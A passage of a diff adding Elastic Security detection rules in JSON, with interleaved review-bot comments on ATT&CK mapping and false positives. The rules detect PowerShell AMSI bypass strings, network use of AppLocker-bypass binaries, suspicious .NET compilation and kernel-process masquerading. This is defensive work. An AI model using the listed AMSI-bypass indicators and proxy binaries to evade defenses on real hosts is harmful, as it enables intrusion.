introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:\"process\" and host.os.type:windows and\n (\n powershell.file.script_block_text : (\n \"System.Management.Automation.AmsiUtils\" or\n\t\t\tamsiInitFailed or \n\t\t\t\"Invoke-AmsiBypass\" or \n\t\t\t\"Bypass.AMSI\" or \n\t\t\t\"amsi.dll\" or \n\t\t\tAntimalwareProvider or \n\t\t\tamsiSession or \n\t\t\tamsiContext or\n\t\t\tAmsiInitialize or \n\t\t\tunloadobfuscated or \n\t\t\tunloadsilent or \n\t\t\tAmsiX64 or \n\t\t\tAmsiX32 or \n\t\t\tFindAmsiFun\n ) or\n powershell.file.script_block_text:(\"[System.Runtime.InteropServices.Marshal]::Copy\" and \"VirtualProtect\") or\n powershell.file.script_block_text:(\"[Ref].Assembly.GetType(('System.Management.Automation\" and \".SetValue(\")\n ) and\n not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\"\n )\n", + "references": [ + "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "1f0a69c0-3392-4adf-b7d5-6012fd292da8", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": 
"TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 8 + }, + "id": "1f0a69c0-3392-4adf-b7d5-6012fd292da8_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_110.json b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_110.json new file mode 100644 index 00000000000..63b9df99a1a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_110.json 
@@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies network activity from unexpected system applications. This may indicate adversarial activity as these applications are often leveraged by adversaries to execute code and evade detection.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Network Activity from a Windows System Binary", + "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, 
status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id with maxspan=5m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n\n /* known applocker bypasses */\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n process.name : \"msiexec.exe\" or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n [network where\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n (\n process.name : \"msbuild.exe\" and\n destination.ip != 
\"127.0.0.1\"\n ) or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n (\n process.name : \"msiexec.exe\" and not\n dns.question.name : (\n \"ocsp.digicert.com\", \"ocsp.verisign.com\", \"ocsp.comodoca.com\", \"ocsp.entrust.net\", \"ocsp.usertrust.com\",\n \"ocsp.godaddy.com\", \"ocsp.camerfirma.com\", \"ocsp.globalsign.com\", \"ocsp.sectigo.com\", \"*.local\"\n ) and\n /* Localhost, DigiCert and Comodo CA IP addresses */\n not cidrmatch(destination.ip, \"127.0.0.1\", \"192.229.211.108/32\", \"192.229.221.95/32\",\n \"152.195.38.76/32\", \"104.18.14.101/32\")\n ) or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1fe3b299-fbb5-4657-a937-1d746f2c711a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": 
"https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + }, + { + "id": "T1218.005", + "name": "Mshta", + "reference": "https://attack.mitre.org/techniques/T1218/005/" + } + ] + }, + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 110 + }, + "id": "1fe3b299-fbb5-4657-a937-1d746f2c711a_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_109.json b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_109.json new file mode 100644 index 00000000000..1d0731b15cf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_109.json 
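Review bot: The threat mapping in this rule nests `T1218.005` (Mshta) under technique `T1127`, but its own reference URL `https://attack.mitre.org/techniques/T1218/005/` shows it is a sub-technique of T1218 (System Binary Proxy Execution), so the ATT&CK coverage reported for this rule will be wrong. Moving it into a separate technique object beside T1127 and T1036 fixes the mapping without touching the query. Separately, the msbuild.exe clause only excludes `destination.ip != "127.0.0.1"`, so a local IPv6 loopback connection (`::1`) would still alert; `not cidrmatch(destination.ip, "127.0.0.0/8", "::1")` is the more complete form, and the hard-coded CA IPs in the msiexec exclusion are CDN addresses that may drift, which is worth a short comment in the query.
```json
{
  "id": "T1218",
  "name": "System Binary Proxy Execution",
  "reference": "https://attack.mitre.org/techniques/T1218/",
  "subtechnique": [
    {
      "id": "T1218.005",
      "name": "Mshta",
      "reference": "https://attack.mitre.org/techniques/T1218/005/"
    }
  ]
}
```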
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies executions of .NET compilers with suspicious parent processes, which can indicate an attacker's attempt to compile code after delivery in order to bypass security mechanisms.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious .NET Code Compilation", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"csc.exe\", \"vbc.exe\") and\n process.parent.name : (\"wscript.exe\", \"mshta.exe\", \"cscript.exe\", \"wmic.exe\", \"svchost.exe\", \"rundll32.exe\", \"cmstp.exe\", \"regsvr32.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "201200f1-a99b-43fb-88ed-f65a45c4972c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: 
Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/", + "subtechnique": [ + { + "id": "T1027.004", + "name": "Compile After Delivery", + "reference": "https://attack.mitre.org/techniques/T1027/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "201200f1-a99b-43fb-88ed-f65a45c4972c_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_110.json b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_110.json new file mode 100644 index 00000000000..5e09cefb03c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_110.json 
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies executions of .NET compilers with suspicious parent processes, which can indicate an attacker's attempt to compile code after delivery in order to bypass security mechanisms.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious .NET Code Compilation", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"csc.exe\", \"vbc.exe\") and\n process.parent.name : (\"wscript.exe\", \"mshta.exe\", \"cscript.exe\", \"wmic.exe\", \"svchost.exe\", \"rundll32.exe\", \"cmstp.exe\", \"regsvr32.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "201200f1-a99b-43fb-88ed-f65a45c4972c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + 
"Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/", + "subtechnique": [ + { + "id": "T1027.004", + "name": "Compile After Delivery", + "reference": "https://attack.mitre.org/techniques/T1027/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "201200f1-a99b-43fb-88ed-f65a45c4972c_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/202829f6-0271-4e88-b882-11a655c590d4_1.json b/packages/security_detection_engine/kibana/security_rule/202829f6-0271-4e88-b882-11a655c590d4_1.json new file mode 100644 index 00000000000..b57d9816a59 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/202829f6-0271-4e88-b882-11a655c590d4_1.json 
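Review bot: This version of the rule ships with no `note` investigation guide and no `false_positives` entry, even though the parent list includes `svchost.exe`, which hosts the Task Scheduler service and so can legitimately be the parent of `csc.exe`/`vbc.exe` when a scheduled task or service compiles code (presumably the most common benign trigger — confirm against telemetry). The other Windows rules in this package carry a triage section; a minimal addition would be `"false_positives": ["Legitimate scheduled tasks or services that compile .NET code at runtime may spawn csc.exe or vbc.exe from svchost.exe."]`. The narrowed index pattern `logs-endpoint.events.process-*` is a good change; the `setup` text is still the generic event.ingested boilerplate and could say which of the listed data sources actually populate `process.parent.name`.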
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for kernel processes with associated process executable fields that are not empty. Unix kernel processes such as kthreadd and kworker typically do not have process.executable fields associated to them. Attackers may attempt to hide their malicious programs by masquerading as legitimate kernel processes.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Executable Masquerading as Kernel Process", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and\nprocess.name : (\"kworker*\", \"kthread*\") and process.executable != null\n", + "references": [ + "https://sandflysecurity.com/blog/linux-stealth-rootkit-malware-with-edr-evasion-analyzed/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "202829f6-0271-4e88-b882-11a655c590d4", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/" + }, + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.004", + "name": "Masquerade Task or Service", + "reference": "https://attack.mitre.org/techniques/T1036/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "202829f6-0271-4e88-b882-11a655c590d4_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/202829f6-0271-4e88-b882-11a655c590d4_2.json b/packages/security_detection_engine/kibana/security_rule/202829f6-0271-4e88-b882-11a655c590d4_2.json new file mode 100644 index 00000000000..8934eb345bf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/202829f6-0271-4e88-b882-11a655c590d4_2.json 
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for kernel processes with associated process executable fields that are not empty. Unix kernel processes such as kthreadd and kworker typically do not have process.executable fields associated to them. Attackers may attempt to hide their malicious programs by masquerading as legitimate kernel processes.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Executable Masquerading as Kernel Process", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\nprocess.name : (\"kworker*\", \"kthread*\") and process.executable != null\n", + "references": [ + "https://sandflysecurity.com/blog/linux-stealth-rootkit-malware-with-edr-evasion-analyzed/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "202829f6-0271-4e88-b882-11a655c590d4", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/" + }, + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": 